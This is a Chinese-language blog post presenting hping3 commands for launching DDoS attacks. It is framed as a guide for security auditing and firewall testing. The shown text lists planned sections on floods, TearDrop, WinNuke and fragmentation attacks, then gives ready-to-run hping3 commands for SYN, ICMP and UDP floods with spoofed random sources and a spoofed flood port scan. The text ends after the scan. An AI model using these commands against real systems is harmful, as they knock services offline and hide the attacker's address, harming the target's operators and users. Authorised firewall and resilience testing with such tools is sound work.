Hping3是安全審計,防火牆測試的重要工具,由於在工作中經常用到,在網上也看到了許多關於Hping3的文章,但是大多數是對Hping3參數的一個翻譯,至於每個參數如何使用,如何聯合多個參數構造出指定類型的DDOS攻擊並沒有介紹,本篇文章將給大家總結了如何發起各種類型的DDOS的命令。
一 、Hping3參數翻譯
——請查看其他博文
二、內容總覽:
1.1、SYN洪水攻擊,1.2、ICMP洪水攻擊,1.3、UDP洪水攻擊,
2.1、端口掃描,
3.1、未知協議類型攻擊,3.2、TearDrop攻擊,3.3、IP數據塊分片傳輸攻擊,3.4、WinNuke攻擊,3.5、超大ICMP數據攻擊,
4.1、IP記錄路由選項攻擊報文,
5.1、SYN數據分片傳輸攻擊,5.2、TCP報頭標誌位全爲0,5.3、SYN和FIN標誌位同時爲0,5.4、僅FIN標誌位爲1。
三、構造各種類型的DDOS攻擊包
1.1、SYN洪水攻擊:
hping3 -S -U --flood -V --rand-source 目標主機IP
1.2、ICMP洪水攻擊:
hping3 -1 -U --flood -V --rand-source 目標主機IP
1.3、UDP洪水攻擊:
hping3 -2 -U --flood -V --rand-source 目標主機IP
2.1、端口掃描:
hping3 目標主機IP --scan 1-100 --flood -S --spoof 60